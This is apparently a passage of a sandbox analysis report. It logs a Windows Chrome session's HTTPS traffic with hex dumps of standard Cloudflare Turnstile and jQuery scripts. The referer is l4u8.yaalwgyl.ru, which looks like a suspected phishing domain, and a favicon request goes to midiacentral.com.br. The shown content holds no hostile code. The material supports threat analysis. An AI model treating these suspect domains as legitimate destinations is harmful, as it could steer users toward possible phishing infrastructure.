                                                                                                    2025-01-14 17:35:50 UTC1369INData Raw: 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31
                                                                                                    Data Ascii: 39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,1


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.556393104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:50 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://l4u8.yaalwgyl.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:50 UTC386INHTTP/1.1 302 Found
                                                                                                    Date: Tue, 14 Jan 2025 17:35:50 GMT
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    access-control-allow-origin: *
                                                                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                    location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f62874efec34f-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.556391151.101.2.1374437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:50 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                    Host: code.jquery.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://l4u8.yaalwgyl.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:50 UTC613INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 89501
                                                                                                    Server: nginx
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Tue, 14 Jan 2025 17:35:50 GMT
                                                                                                    Age: 2360676
                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740030-EWR
                                                                                                    X-Cache: HIT, HIT
                                                                                                    X-Cache-Hits: 2774, 5
                                                                                                    X-Timer: S1736876151.928646,VS0,VE0
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                    2025-01-14 17:35:50 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.556394108.167.132.2544437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:50 UTC354OUTGET /favicon.ico HTTP/1.1
                                                                                                    Host: midiacentral.com.br
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:51 UTC176INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:51 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.556398104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:51 UTC647OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://l4u8.yaalwgyl.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:51 UTC471INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:51 GMT
                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                    Content-Length: 47521
                                                                                                    Connection: close
                                                                                                    accept-ranges: bytes
                                                                                                    last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                    access-control-allow-origin: *
                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f628b2e1415bb-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:51 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                    Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                    2025-01-14 17:35:51 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                    Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                    2025-01-14 17:35:51 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                    Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
